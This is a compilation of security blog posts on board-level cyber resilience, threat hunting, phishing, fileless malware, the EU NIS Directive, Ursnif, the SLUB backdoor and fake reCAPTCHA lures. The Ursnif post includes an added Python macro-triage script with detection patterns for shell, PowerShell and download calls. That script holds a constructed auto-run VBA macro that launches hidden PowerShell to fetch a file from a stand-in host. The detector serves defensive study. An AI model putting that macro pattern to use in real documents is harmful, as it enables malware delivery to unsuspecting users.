In February 2019, the World Economic Forum (WEF) released a special report titled “Cyber Resilience in the Electricity Ecosystem: Principles and Guidance for Boards,” which supplements a prior report on cyber resilience issued in 2017. In light of the interconnectedness of organizations and ecosystems today, I’d argue that the report’s main principles can apply well beyond the electrical industry. Examples of other ecosystems that could be severely disrupted — or, worse, catastrophically impacted — by cyberattacks or cyber failures include the global banking sector, global stock exchanges, and the transportation sector and its supporting infrastructure.

We Need a Systemwide View of Resilience

Of course, it is easier to mentally conceive of the impacts of cyber risks on the electrical grid as they relate to our way of life; many of us have had the displeasure of living through a blackout, where the noise of our busy lives suddenly gives way to the deafening silence of a powered-down world. However, as organizations begin to understand and take stock of the interconnectedness of their supply chains and the intricate nature of their business partnerships, the cyber risk discussion must evolve from internally focused defenses and reactions into a larger systemwide view of resilience.

To help guide global stakeholders — government leaders, boards of directors, top leadership, and IT and security leaders — the WEF resilience report provides a number of principles that organizations should follow and governments should keep a close eye on. Failure to act now, while we still can — and can do so at a reasonable cost — could lead to systemic shocks and engender cascading failures on a scale never seen before.

While the idea of “stress tests” has been used many times in the financial sector, its applicability to our connected world is long overdue. But it all starts at the top, with a strong governance principle.

The Governance of Cyber Resilience

Over the past decade, there has been a shift in the boardroom to pay increasing attention to the issues of cybersecurity and cyber risks. Instead of leaving those issues for IT to deal with, board directors have rightfully become more engaged in overseeing management’s activities and, by extension, ensuring that the organization is as cyber resilient as it needs to be.

At the board level, resilience in the cyber realm isn’t about asking, “Are we doing something?” or, “What are we doing?” but rather, “How well are we doing?” and, “How do we know we would be able to recover from a cyber outage?” The WEF report provides several questions for boards to ask of top leadership and chief information security officers (CISOs), such as:

  • How much operational technology (OT) do we have? How much crossover is there between OT, IT and physical security? Could an issue in one domain move into another?
  • Have roles and responsibilities for each area — resilience for IT, OT and physical — been defined? How well do these areas collaborate or integrate with one another, as opposed to operating in silos?
  • What processes and structures are in place to “ensure a coordinated cyber resilience strategy” across the organization?

For the CISO, this is an opportunity to be more of a strategic partner and adviser to top leadership and the board, to shed much-needed light on just how well the organization is prepared to detect, contain and recover from a cyber disruption. However, having the board’s support is key to helping the CISO break what are otherwise longstanding barriers and the “this is how we’ve always done it” attitude. With that support, the CISO can work to integrate cyber risk management into all business decisions.

Resilience by Design

One of the most striking differences between IT and OT is their very different design imperatives. Most of IT was designed with short component lifetimes (3–5 years), a preference for confidentiality (at least when compared to expectations for OT components), and expectations that delays, while inconvenient, are part of the IT ecosystem as components are replaced, upgraded or simply patched.

By contrast, OT components are designed to last 10 to sometimes 20 years, with high-availability requirements under near real-time conditions, meaning there’s never a good time to take OT systems down for maintenance or patching.

It is thus critical to design and deploy cyber resilient components for new IT and OT systems and closely monitor existing systems already in place. On this front, board directors are told to ask questions such as:

  • How are cyber risks considered and accounted for at the onset of new projects and in current operations, across the business?
  • How does management ensure that appropriate controls have been put in place, and how is the effectiveness of those controls evaluated and monitored? Just how cyber resilient are current systems?
  • How does leadership communicate the importance of cyber resilience throughout the organization and enable cross-functional information flows?

The good news is that boards and management can empower their CISO and the rest of the security function to take the lead on providing answers to these questions. The bad news is that looking at the organization as an island isn’t the right approach; we must consider the whole ecosystem.

Reciprocal Impacts Between Organizations and Ecosystems

Boards are also coming to grips with the reality that compliance isn’t sufficient to safeguard their organization’s operations and profits given the complex, highly interconnected ecosystems they operate within. With this realization, boards are asking better questions and engaging in enterprise risk conversations to drive important topics, such as the availability and distribution of security resources and budgets, and a more holistic approach to enterprise risk management that goes beyond compliance to also include risk appetite and alignment with organizational goals and strategy.

Beyond the internal focus, boards are also asking top leadership to look outward, to ensure that management is aware and understands how changes and disruptions in the ecosystem can impact the organization and, conversely, how disruptions in the organization’s own IT and OT could impact the wider ecosystem.

This focus goes beyond the routine of third-party vendor assessments and the management of those particular risks to include a broader view of the risks posed to the organization by the ecosystem and vice versa: highest external risks and their impacts, reputational risks, external dependencies and procurement process agility, testing and integration of new systems, and preparedness against cascading failures originating outside the organization.

Collaborate and Test Across Your Ecosystem

With the realization that “we’re all in this together,” boards want to learn how effectively their organizations are collaborating with the rest of the ecosystem in planning and testing cyber resilience. What mechanisms are in place to share best practices and alerts (e.g., the various Information Sharing and Analysis Centers in the U.S.)? What government resources or bodies are available to interface with? How does management ensure that it is aware of relevant information that may be shared with the organization via those channels? How is information received through such channels used for strategic decisions by management?

A clear example of this commitment to collaboration across the ecosystem for the betterment of all is the Charter of Trust, which leading global companies such as Siemens, Airbus, Allianz, Daimler and IBM have signed on to as a way “to strengthen trust in the security of the digital economy.” The 10 principles outlined in the Charter of Trust are fully aligned with, and reinforce the commitment of, the management of each of those companies to creating a better, safer digital ecosystem for us all.

While collaboration and sharing of threat information and best practices is key, the entire ecosystem would be left in a highly fragile state if peers and competitors didn’t also collaborate to prepare and test their cyber resilience plans. Once again, the CISO is well-placed to be part of those discussions and exercises, to help evaluate just how well the ecosystem can respond to and recover from a cyber incident.

Top leadership and board directors are coming to grips with the need for their organizations — together with their peers and competitors in the ecosystem — to be more resilient to cyber attacks and disruptions. CISOs, who now have a seat at the table, must play a leading role in this effort.

The post Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort appeared first on Security Intelligence.

Hunting for the True Meaning of Threat Hunting at RSAC 2019

After my first-ever RSA Conference experience, I returned to Boston with a lot of takeaways — not to mention a week’s worth of new socks, thanks to generous vendors that had a more functional swag approach than most. I spent the majority of my time at RSAC 2019 at the Master Threat Hunting kiosk within the broader IBM Security booth, where I told anyone who wanted to listen about how we use methodologies and tools from the military and intelligence communities to fight cyberthreats in the private sector. When I wasn’t at the booth, I was scouring the show floor on a hunt of my own — a hunt for the true meaning of threat hunting.

Don’t Believe the Hype: 3 Common Misconceptions About Threat Hunting

At first glance, the results of my hunt seemed promising; I saw the term “threat hunting” plastered all over many of the vendors’ booths. Wanting to learn more, I spoke with the booth personnel about their threat hunting solutions, gathered a stack of marketing one-pagers and continued on my separate hunt for free socks and stress balls.

After digesting the information from booth staff and digging into the marketing materials from the myriad vendors, I was saddened to learn that threat hunting is becoming a full-blown buzzword.

Let’s be honest: “Threat hunting” certainly has a cool ring to it that draws people in and makes them want to learn more. However, it’s important not to lose sight of the fact that threat hunting is an actual approach to cyber investigations that has been around since long before marketers started using it as a hook.

Below are three of the most notable misconceptions about threat hunting I witnessed as I prowled around the show floor at RSAC 2019.

1. Threat Hunting Should Be Fully Automated

In general, automation is great; I love automating parts of my life to save time and to make things easier. However, there are some things that can’t be fully automated — or shouldn’t be, at least not yet. Threat hunting is one of those things.

While automation can be used within various threat hunting tools, it is still a very manual, human-led process to proactively (and reactively) hunt for unknown threats in your network that may have avoided your rules-based detection solutions. Threat hunting methodologies were derived from the counterterrorism community and repurposed for cybersecurity. There’s a reason why we don’t fully automate counterterrorism analysis, and the same applies to cyber.

2. Threat Hunting and EDR Are One and the Same

This was the most common misconception I encountered while searching for threat hunting solutions at RSAC. It went something like this: I would go into a booth, ask to learn more about the vendor’s threat hunting solution and come to find that what’s actually being marketed is an endpoint detection and response (EDR) solution.

EDR is a crucial piece of threat hunting, but these products are not the only tools threat hunters use. If threat hunting were as easy as using an EDR solution to find threats, we would have a much higher success rate. The truth is that EDR solutions need to be coupled with other tools, such as threat intelligence, open-source intelligence (OSINT) and network data, and brought together in a common platform to visualize anomalies and trends in the data.

3. Threat Hunting Is Overly Complicated

All of the marketing and buzz around threat hunting has overcomplicated what it actually is. It’s not one tool, it’s not automated, it’s not an overly complicated process. It takes multiple tools and a ton of data, it is very much dependent on well-trained analysts who know what they’re looking for, and it is an investigative process just like counterterrorism and law enforcement investigations. Since cyber threat hunting mirrors these investigative techniques, threat hunters should look toward trusted tools from the national security and law enforcement sectors.

What Is the True Meaning of Cyber Threat Hunting?

Don’t get me wrong — I am thrilled that threat hunting is gaining steam and vendors are coming up with innovative solutions to contribute to the definition of threat hunting. As a former analyst, I define threat hunting as an in-depth, human-led, investigative process to discover threats to an organization. My definition may vary from most when it comes to how this is conducted, since most definitions emphasize that threat hunting is a totally proactive approach. While I absolutely agree with the importance of proactivity, there aren’t many organizations that can take a solely proactive approach to threat hunting due to constraints related to budget, training and time.

While not ideal, there is a way to hunt reactively, which is often more realistic for small and midsize organizations. For example, you could conduct a more in-depth cyber investigation to get the context around a cyber incident or alert. Some would argue that’s just incident response, not threat hunting — but it turns into threat hunting when an analyst takes an all-source intelligence approach to enrich their investigation with external sources, such as threat intelligence and social media, and other internal sources of data. This approach can show the who, what, where, when and how around the incident and inform leadership on how to take the best action. The context can be used to retrain the rules-based systems and build investigative baselines for future analysis.

The Definition of Threat Hunting Is Evolving

Cyber threat hunting tools come in all shapes and sizes, but the most advanced tools allow you to reactively and proactively investigate threats by bringing all your internal and external data into one platform. By fusing internal security information and event management (SIEM) data, internal records, access logs and more with external data feeds, cyber threat hunters can identify trends and anomalies in the data and turn it into actionable intelligence to address threats in the network and proactively thwart ones that haven’t hit yet.

Behind the buzz and momentum from RSAC 2019, threat hunting will continue to gain traction, more advanced solutions will be developed, and organizations will be able to hunt down threats more efficiently and effectively. I’m excited to see how the definition evolves in the near future — as long as the cyber threat hunting roots stay strong.

Read the “SANS 2018 Threat Hunting Results” report

The post Hunting for the True Meaning of Threat Hunting at RSAC 2019 appeared first on Security Intelligence.

Threat Actors Use Fake Copyright Infringement Notifications in Instagram Hacking Campaign

Security researchers discovered that attackers are using fake copyright infringement notifications to hack Instagram influencer accounts.

Detected by Kaspersky Lab, the Instagram hacking campaign involves threat actors sending Instagram influencers fraudulent emails claiming that the social media network intends to permanently delete their account for copyright infringement. The attack email uses the social networking service’s official header and logo to deceive victims. It even originates from an email address — or — that looks similar to Instagram’s actual support email,

Using these disguises, the email notifies targeted users that they have 24 hours to verify their account before it is deleted. Clicking on the email’s “Review complaint” button redirects users to a phishing page where they can supposedly appeal the decision to delete their profile.

At that point, users can proceed by clicking an “Appeal” link and submitting their Instagram credentials to the attackers. The scam then asks users to verify their email address by choosing their email provider and entering the login credentials for their account.

Just the Latest Instagram Hacking Attack

This is just the latest scam to target Instagram users. Back in August 2018, for instance, Mashable reported on a string of hacks in which threat actors took over users’ accounts and added a .ru email address to their profiles. News of another attack wave came a month later when Motherboard reported that attackers had hijacked at least four high-profile Instagrammers’ accounts and extorted them for money.

Most recently, Trend Micro detected yet another scam operation in February 2019 in which fraudsters targeted Instagram users with the false promise of a “verified” badge for their accounts.

How to Defend Against Phishing Attacks

Security professionals can help defend their organizations against phishing attacks by using ahead-of-threat detection to block potential phishing domains, even those that threat actors have cloned to look like legitimate websites.

Security teams should also test their phishing defenses by conducting a simulated phishing engagement. Organizations can then use this exercise to identify employees who need more training on social engineering attacks as well as to conduct follow-up testing for the entire workforce.

The post Threat Actors Use Fake Copyright Infringement Notifications in Instagram Hacking Campaign appeared first on Security Intelligence.

Will We See the Rise of Vaporworms and Other New Fileless Attacks in 2019?

The evolution of the new and difficult-to-detect category of fileless attacks may soon take an insidious turn with the development of what some researchers are calling vaporworms.

As the name suggests, fileless malware differs from conventional malware in that it doesn’t require a file to be created and saved on a computer. Instead, it leverages scripts or even legitimate running processes to inject itself directly into a device’s memory. But what’s on the horizon for this emerging threat?

The Threat of Fileless Attacks

Trend Micro first reported on a fileless payload with wormlike replication capabilities in November 2018. The malware, a fileless version of the Bladabindi backdoor, avoided detection by depositing its payload in the Windows registry, which is a key-value database that exists only in Windows memory. It then created another registry entry that instructed Windows to load it at boot time. Because the entire process took place in memory, it didn’t leave a trail on the infected computer’s hard disk drive.

The emergence of vaporworms indicates that fileless malware has now taken on self-propagating capabilities, a development that could greatly magnify its impact. However, the only vaporworms that have been detected so far in the wild propagate by installing copies of themselves on removable storage devices, such as flash drives and external disk drives. This enables them to spread without leaving a trace on the host’s primary storage media. Every time an infected drive is plugged into a new machine, the infection cycle begins again. This is a fairly primitive form of propagation, but a potentially disturbing harbinger of things to come.

This kind of threat can be detected, but not with conventional anti-malware products that work by matching files stored on disks to known malware signatures. Since this new kind of malware never saves a copy of itself to a disk, it can’t be detected by these more traditional scanners. Unfortunately, detection currently must take place after the fact, and an intruder can do a lot of damage if the attack is not intercepted early.

An Old Nemesis Reinvented

Fileless attacks actually aren’t new — the Code Red worm that infected nearly 360,000 Microsoft Internet Information Services servers in 2001 was an early version of a fileless threat — but the concept has re-emerged over the past couple of years with a focus on endpoint devices. According to SentinelOne, fileless attacks rose by 94 percent in the first half of 2018. Given how efficiently threat actors can compromise endpoints using this tactic, the threat of fileless malware shows no signs of slowing down.

Trend Micro’s discovery of a variation of the well-known Bladabindi backdoor alarmed many security researchers. Analysts found an open-source scripting tool that worked with PowerShell to compile itself into a single executable file that installed the malware, modified the registry and installed hidden copies of itself on removable media. This made it both difficult to detect and easy to spread.

“The worm’s payload, propagation, and technique of filelessly delivering the backdoor in the affected system make it a significant threat,” wrote Trend Micro’s Carl Maverick R. Pascual.

It was the self-replication features that gave birth to the term vaporworms. Once malware acquires the ability to infiltrate network shares, it can spread at exponential speed. Some researchers have drawn analogies to the WannaCry/WanaCrypt0r 2.0 ransomware attack of 2017, which hit organizations in more than 100 countries in just 48 hours.

When It Comes to Vaporworms, You Can’t Be Too Cautious

So far, there is no evidence that any fileless variants use networks to replicate, but the possibility should have enterprise security teams on high alert. For now, the best protection is to closely monitor the use of removable storage devices, double down on endpoint security and restrict the use of tools like PowerShell.

While conventional anti-malware protection may not detect in-memory signatures, makers of those tools are continually evolving their products to adapt to new threats. In the meantime, security professionals should use intrusion prevention systems to look for signs of vaporworm damage and limit the rate of infection. Endpoint detection solutions can also monitor for suspicious activity that indicates the presence of a backdoor Trojan.

The nightmare scenario is that fileless malware merges with ransomware to create a highly malicious and almost undetectable vaporworm threat that can infect entire enterprise networks in a matter of minutes. There’s no indication this has happened yet, but as is always the case with cybersecurity, you can’t be too cautious.

The post Will We See the Rise of Vaporworms and Other New Fileless Attacks in 2019? appeared first on Security Intelligence.

Breaking Down the Incident Notification Requirements in the EU’s NIS Directive

Our society relies on the availability, security and reliability of network and information systems (NIS). Various security frameworks provide standards and guidance as to which measures organizations should implement to protect IT systems and increase resilience. However, since such recommendations are not ingrained as actual laws in most countries, these best practices and guidelines are often followed solely on a voluntary basis.

This contrasts with the European Union (EU)’s NIS Directive, legislation that sets a range of network and information security requirements to raise the level of IT security across all EU member states. While the directive covers a few different domains, including preparedness, cross-EU collaboration and incident response (IR), one of its main pillars focuses on breach notification requirements.

In this post, we will focus specifically on the aspects of incident notification contained in the NIS Directive as they apply to operators of essential services (OES).

Regulations Versus Directives

The NIS Directive is a different type of legal act compared to, say, the General Data Protection Regulation (GDPR). The latter is immediately applicable and enforceable by law in all member states. A directive is somewhat different.

While a directive also applies to all member states, it is not immediately applicable; instead, it sets goals, requirements and results that must be achieved. It is then up to each member state to devise its own laws on how to reach these goals and what penalties noncompliance will carry. The NIS Directive also only sets a floor: stricter requirements can apply depending on the organization’s industry sector and the member state(s) in which it operates.

This legal status reveals one of the possible issues with a directive: Whereas a regulation is direct law, a directive needs to be transposed into local laws by each member state. These transpositions can result in differences in the implementation of the directive into law, in some cases complicating matters for organizations that operate across borders.

Variance in Incident Notification Definitions

One of the articles in the NIS Directive that has received a lot of attention is Article 14, which outlines requirements for security and incident notification. It stipulates that member states must ensure that OES notify the national competent authority and the national computer security incident response team (CSIRT) in case of an incident that significantly impacts the continuity of an essential service. This is not entirely new — depending on the type of activity or sector, there are already requirements for incident reporting in Europe, including Article 13a of the Telecom Framework Directive.

An additional element of complexity is that, according to Article 5, the identification of OES per sector needs to happen individually within each member state. Although organizations might give input to this process, the actual identification is out of their hands. This process is another way by which the directive could result in various interpretations that end up adding complexity.

The Benefits of Incident Notification

One of the drivers for notification in the context of the directive is to be compliant with legal requirements. However, if the starting point of your organization is to only comply with the bare minimum of these notification requirements, then you will miss out on the opportunities provided by the directive.

Additionally, the bulk of these requirements, including notification and detection capabilities, should already be covered in large part by your existing security environment. If this is not the case, you can use the NIS Directive as a wake-up call to improve your security posture.

From a policymaker’s point of view, the notification requirements can help better identify the challenges within a sector and propose mitigation measures that are based on actual facts and figures. These facts and figures can then be used by CSIRTs (or a responsible authority) to provide more relevant warnings and situation reports together with sector-specific threat intelligence. Similarly, this information can also be used to evaluate cross-border impact of incidents or threats and optionally notify other member states.

Breaking Down Notification Requirements

Now, let’s dive into some details of the NIS Directive. There are essentially three main parts to the notification requirement.

First, prior to notification, organizations need to be able to detect security incidents — i.e., they must possess appropriate detection capabilities. The second part involves defining what a significant incident is and what risks, either directly or indirectly, can have significant impact on an essential service. The last part of the notification requirement involves understanding when, what, how and to whom organizations must report incidents.

First Things First — Detection

Every notification starts with proper detection of an incident. You can find guidelines on detection capabilities in a reference publication from the NIS Cooperation Group on security measures.

The core principles for these security measures include being effective, tailored, compatible, proportionate, concrete, verifiable (evidence of the effective implementation of security policies) and inclusive (includes all security domains that may contribute to reinforcing cybersecurity).

Applying NIS measures to the domain of detection and resilience can be done by:

  • Setting up a detection system to analyze files and protocols — this can include, for example, network intrusion detection systems (NIDSs) or malware sandboxes;
  • Enabling logging on critical systems (log entries should include time stamps);
  • Collecting the logs centrally; and
  • Conducting log correlation and analysis on the events coming from critical systems.

All of the above actions can also be automated with a security information and event management (SIEM) solution.

After Detection — Defining Incidents

But what, exactly, is a security incident? Article 4 defines it as any event that has an actual “adverse effect” on the security of network and information systems. As a side note, the directive does not include a definition of what is covered by “adverse.”

Based on the information from the NIS Cooperation Group, we can combine the definition of an incident with the definition of security of network and information systems. This would redefine an incident to be any event that affects the authenticity, confidentiality, integrity or availability of network and information systems, and has a significant impact on the continuity of the essential service itself.

What Is a Significant Incident?

A set of three parameters from Article 14 of the NIS Directive can be used to determine what is considered a significant incident:

  • The number of users that are affected by the disruption of the essential service.
  • The duration of the incident.
  • The geographic spread of those affected by the incident.

Additionally, the parameters from Article 6 are also helpful in defining what qualifies as a significant incident:

  • What is the dependency of other OES on the service affected by the incident?
  • What is the impact (degree, duration) on economic and social activities or on public safety? In particular, the impact on social activities can be hard to measure for OES.
  • How large is the market share of the affected service?
  • What is the geographic spread that could be affected?
  • How important is the affected element for maintaining a sufficient level of service?

In general, OES already use most of these parameters to define crises within their services, including crises that are unrelated to IT.

The actual criteria, thresholds and parameters for determining significant incidents are defined by member states. These can include the parameters defined in the NIS Directive, possibly extended with additional national or sector-specific criteria.

The Directive’s Notification Timeline

According to Article 14, organizations need to notify without undue delay, although this timeline can be shortened or specified based on the member state. The term “undue” can also be subjective, but in most cases, this means the organization must send a preliminary notification whenever an incident is first detected, even if all the details are not available yet. The goal is to raise awareness. As your investigation progresses, you can provide intermediate follow-ups, and when the incident is closed, you can provide a full report.

It’s fairly simple to implement this step. Your IR plan should already include a notification and escalation path for certain types of critical incidents during the detection and analysis phases. It should also foresee a final incident report as part of the lessons-learned phase.

In essence, this requirement is an extension of an already established IR plan and recovery process.

Where to Report?

Each member state is free to choose its own reporting framework. This can be the national authority, sectoral authorities or a combination of both, in addition to notifying the national CSIRT.

As an organization, it is important to identify to whom you have to report, exchange contact details between your security team and the notification body, and establish and test this communication process.

Use the NIS Directive as an Opportunity

Similar to the GDPR, you can approach this directive as a roadblock or a nuisance, or you can consider it an excellent opportunity to improve your security posture. The fact that some security requirements are legal requirements can help you further establish your security program.

There are many articles in the directive to take into account, but you should start by focusing on the following:

  • Article 4, which defines a security incident;
  • Article 5, which mandates that member states should identify OES;
  • Article 6, which sets additional parameters to define significant incidents; and
  • Article 14, which requires you to implement security measures and notification processes. This article also contains the three base parameters to define what is a significant incident and describes the accepted delay for notifications.

Unfortunately, despite the fact that the bulk of the NIS Directive has been well-known for quite some time, not all EU member states have finalized the phase of transposing the recommendations into actual laws.

If this is the case for your environment, you might benefit from the situation and provide your lawmakers with input for security measures that would actually improve the level of security for network and information systems in your sector.

The post Breaking Down the Incident Notification Requirements in the EU’s NIS Directive appeared first on Security Intelligence.

Threat Actor Targets Japanese Users With New Ursnif Variant

Security researchers discovered an attack campaign targeting Japanese users with a new variant of Ursnif banking malware.

Cybereason reported that the campaign, first observed at the beginning of 2019, begins with a phishing email that attempts to trick unsuspecting Japanese users into enabling the embedded macros of a weaponized Microsoft Office document. This results in the execution of several PowerShell commands that, in turn, download an image file. The image uses steganography to hide Bebloh, malware that ultimately pulls down Ursnif’s loader from the attacker’s command-and-control (C&C) server.

The campaign’s final payload differs from previous variants in that it:

  • Creates “last-minute persistence” the moment before an infected system shuts down and injects its core dynamic link library (DLL) into explorer.exe once the machine reboots;
  • Comes with updated modules for stealing credentials from Outlook, Mozilla Thunderbird and Internet Explorer;
  • Has a new module that enables it to steal from cryptocurrency wallets and disk encryption software; and
  • Uses yet another module to evade PhishWall, a Japanese security product.

A Busy Few Months for Ursnif

This isn’t the first time cyberattackers have targeted Japanese users with Bebloh and Ursnif. In August 2018, for instance, Trend Micro detected a campaign in which threat actors used the Cutwail botnet and abused internet query files to distribute the threats. Just two months later, Trend Micro analyzed a similar operation spreading both types of malware.

Ursnif has also been busy without Bebloh. For example, Carbon Black reported on an attack campaign on Jan. 24 in which malicious actors used macros and a PowerShell script to download the malware along with GandCrab ransomware. That same day, Cisco Talos uncovered a fileless operation involving Ursnif. Then, the following month, Bromium detected a sample of the malware hidden within an image of Mario, the popular Nintendo character.

How to Detect Banking Malware Campaigns

Security professionals can defend against campaigns that spread Ursnif and other banking malware by using ahead-of-threat detection to analyze the WHOIS information of potential phishing sites. Organizations should also use tools such as the VBA editor to inspect the macro code in suspicious Office documents.
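Inspecting macro code by hand is slow when the launcher string is split across `&` concatenations and `Chr()` calls, as it typically is in the macro-to-PowerShell chain described above. As an added example that is not code from the post or from Cybereason, this Python script recovers a macro's string literals from that obfuscation and reports which indicators (auto-execution entry point, object creation, script host, PowerShell, hidden window, download) the code and strings trigger; the sample macro and its URL are constructed.

```python
# Added example (not code from the post or from Cybereason): static triage of a VBA
# macro body. It recovers string literals hidden behind '&' concatenation and Chr()
# calls, then reports which indicators the code and strings trigger. SAMPLE_VBA,
# including its URL, is constructed for illustration.
import re

SAMPLE_VBA = r'''
' Constructed macro: concatenation and Chr() calls hide the launcher string.
Private Sub Document_Open()
    Dim cmd As String
    cmd = "pow" & "ersh" & "ell -w hidden -c " & Chr(34) & "Invoke-WebRequest " & _
          "http://example.invalid/pic.png" & Chr(34)
    CreateObject("WScr" & "ipt.Shell").Run cmd, 0
End Sub
'''

CHR_RE = re.compile(r'\bchrw?\(\s*(\d+)\s*\)', re.I)
JOIN_RE = re.compile(r'"\s*&\s*"')           # "abc" & "def"  ->  "abcdef"
STRING_RE = re.compile(r'"((?:[^"]|"")*)"')  # VBA literal; "" inside is an escaped quote

# (indicator, pattern matched against the deobfuscated code plus recovered strings)
RULES = [
    ('autoexec', r'\b(?:auto_?open|auto_?close|document_open|document_close|workbook_open)\b'),
    ('object-creation', r'\bcreateobject\s*\('),
    ('shell-execution', r'wscript\.shell|shell\.application|\bshell\s*\(|\.(?:run|exec)\b'),
    ('powershell', r'\bpowershell|\bpwsh\b'),
    ('hidden-window', r'-w(?:indowstyle)?\s+hidden|\.run\s+\w+\s*,\s*0\b'),
    ('downloader', r'https?://|downloadfile|downloadstring|invoke-webrequest|\biwr\b|webclient|bitstransfer'),
]

def deobfuscate(source):
    """Join line continuations, turn Chr(n) into a literal and merge adjacent literals."""
    code = re.sub(r'\s_\r?\n\s*', ' ', source)
    code = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))).replace('"', '""') + '"', code)
    while JOIN_RE.search(code):
        code = JOIN_RE.sub('', code)
    return code

def analyze_vba(source):
    """Return the recovered string literals and the indicators they and the code trigger."""
    code = deobfuscate(source)
    strings = [s.replace('""', '"') for s in STRING_RE.findall(code)]
    haystack = code + '\n' + '\n'.join(strings)
    indicators = [name for name, pattern in RULES if re.search(pattern, haystack, re.I)]
    return {'strings': strings, 'indicators': indicators}

def is_suspicious(source):
    """An auto-executing entry point combined with execution or download capability."""
    found = set(analyze_vba(source)['indicators'])
    return 'autoexec' in found and bool(found & {'shell-execution', 'powershell', 'downloader'})

if __name__ == '__main__':
    result = analyze_vba(SAMPLE_VBA)
    print('recovered strings:', result['strings'])
    print('indicators:', result['indicators'], '-> suspicious' if is_suspicious(SAMPLE_VBA) else '')
```

The script expects the macro source as text (for example, copied out of the VBA editor); it does not parse the Office container itself, and it will not see strings built at run time with anything other than concatenation and Chr().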

The post Threat Actor Targets Japanese Users With New Ursnif Variant appeared first on Security Intelligence.

SLUB Backdoor Receives Commands From GitHub and Communicates Through Slack

Security researchers have discovered that the new SLUB backdoor is receiving attack commands from GitHub and relying on Slack for communicating with its attackers.

Trend Micro detailed how this malware campaign began with watering hole attacks that redirected users to webpages hosting malicious code. The campaign proceeded with infection whenever these attacks caught someone whose machine had not been patched against CVE-2018-8174, a VBScript engine vulnerability Microsoft fixed in May 2018.

Upon exploitation, the attack downloaded a dynamic-link library (DLL) and ran a PowerShell command. This process loaded a downloader that, in turn, downloaded and ran a second executable file containing the SLUB backdoor.

Detected as Backdoor.Win32.SLUB.A, the SLUB backdoor is a threat written in C++ that stands out for two reasons:

  • First, it embeds two authorization tokens to communicate with Slack’s application programming interface (API).
  • Second, it downloads a gist snippet from GitHub and parses it to search for commands.

The backdoor uses these two steps to post the result of its commands in a private Slack channel within a workspace using the embedded tokens. With this flow in place, digital attackers can use SLUB to take screen captures, create archive files and exfiltrate information.

The Ongoing Relevance of Watering Hole Attacks

This campaign isn’t the only recent operation to use watering hole attacks. For example, ESET detected one such campaign in November 2018, in which the OceanLotus group used watering hole attacks to target several websites in Southeast Asia. Several months later, ESET reported that the APT LuckyMouse group had preyed on the International Civil Aviation Organization using a watering hole attack.

These incidents illustrate how watering hole attacks pose an ongoing threat to organizations. Indeed, Carbon Black found that more than one-fifth (21 percent) of financial services companies had recently experienced this type of attack. Threat actors could use a successful attack in those cases to steal money and undermine customer trust in the financial institutions.

How to Defend Against Threats Like the SLUB Backdoor

Security professionals can defend against digital threats like the SLUB backdoor by using a layered security approach. This strategy should include machine learning and threat detection sandboxing to strengthen endpoint defenses against emerging threats, such as fileless malware.

Organizations should also practice risk-based vulnerability management to prioritize the software security flaws they should patch first.

The post SLUB Backdoor Receives Commands From GitHub and Communicates Through Slack appeared first on Security Intelligence.

Phishing Campaign Uses Fake Google reCAPTCHA to Distribute Malware

A recent phishing campaign used a fake Google reCAPTCHA as part of its efforts to target Polish bank employees with malware.

Sucuri researchers discovered that the campaign sent out malicious emails masquerading as a confirmation for a recent transaction. Digital attackers deployed this disguise in the hopes that employees at the targeted bank would click on a link to a malicious PHP file out of alarm. That file was responsible for loading a fake 404 error page for visitors that had specifically defined user-agents.

If the visitor passed the user-agent filter, the PHP code loaded a fake Google reCAPTCHA. Because it was built from static HTML and JavaScript, it could not rotate the individual images used in each challenge, and it did not support audio replay.

At that point, the PHP code checked the victim’s browser user-agent to determine what payload it should deliver. If it found the victim was using an Android device, the attack would load a malicious APK file capable of intercepting two-factor authentication (2FA) codes. Otherwise, it would download a malicious ZIP archive.

A History of Abusing and Bypassing CAPTCHAs

This isn’t the first time threat actors have incorporated CAPTCHAs into their attack campaigns. Back in 2016, researchers at the University of Connecticut and Bar Ilan University identified a malicious attack in which threat actors could trick users into divulging some of their personal information by completing a fake CAPTCHA. In February 2018, My Online Security observed a campaign that used an image pretending to be a Google reCAPTCHA to download a malicious ZIP file.

Malefactors have also tried to bypass legitimate CAPTCHAs for the purpose of conducting attack campaigns. All the way back in 2009, for example, IT World reported on a worm named Gaptcha that circumvented Gmail’s authentication feature to create new dummy accounts from which to send spam mail. More recently, BullGuard discovered some survey scams using CAPTCHAs to make their ploys more believable.

Defending Against Fake reCAPTCHA Phishing Campaigns

Security professionals can help protect their organizations from fake reCAPTCHA-wielding phishing campaigns by taking an ahead-of-threat approach to detection. Companies should also reject SMS-based 2FA schemes in favor of more practical and convenient multifactor authentication (MFA) deployments that fit into a context-based access strategy.

The post Phishing Campaign Uses Fake Google reCAPTCHA to Distribute Malware appeared first on Security Intelligence.

Most attacks against energy and utilities occur in the enterprise IT network

The United States has not been hit by a paralyzing cyberattack on critical infrastructure like the one that sidelined Ukraine in 2015. That attack disabled Ukraine's power grid, leaving more than 700,000 people in the dark.

But the enterprise IT networks inside energy and utilities organizations have been infiltrated for years. Based on an analysis by the U.S. Department of Homeland Security (DHS) and FBI, these networks have been compromised since at least March 2016 by nation-state actors who perform reconnaissance activities looking for industrial control system (ICS) designs and blueprints to steal.